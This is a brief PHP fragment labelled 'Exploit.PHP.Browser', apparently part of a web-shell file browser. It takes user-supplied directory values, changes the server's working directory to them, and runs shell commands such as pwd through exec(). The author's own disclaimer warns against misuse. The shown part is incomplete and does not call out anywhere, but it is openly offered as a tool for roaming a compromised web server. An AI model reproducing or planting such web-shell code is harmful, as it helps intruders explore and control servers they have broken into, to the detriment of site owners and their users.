// Exploit.PHP.Browser By Psychologic
// Take ur own risk if you do stupid things
// with this.
if (isset($dir_kerja)) {
chdir($dir_kerja); //change to working directory
$dir_kerja = exec("pwd"); //execute the pwd(daemon)
} else {
chdir($DOCUMENT_ROOT); //Get the root directory
$dir_kerja = $DOCUMENT_ROOT;
}
if (trim($dir_baru) <> "") {
chdir($dir_baru);
$dir_kerja = exec("pwd");
}
?>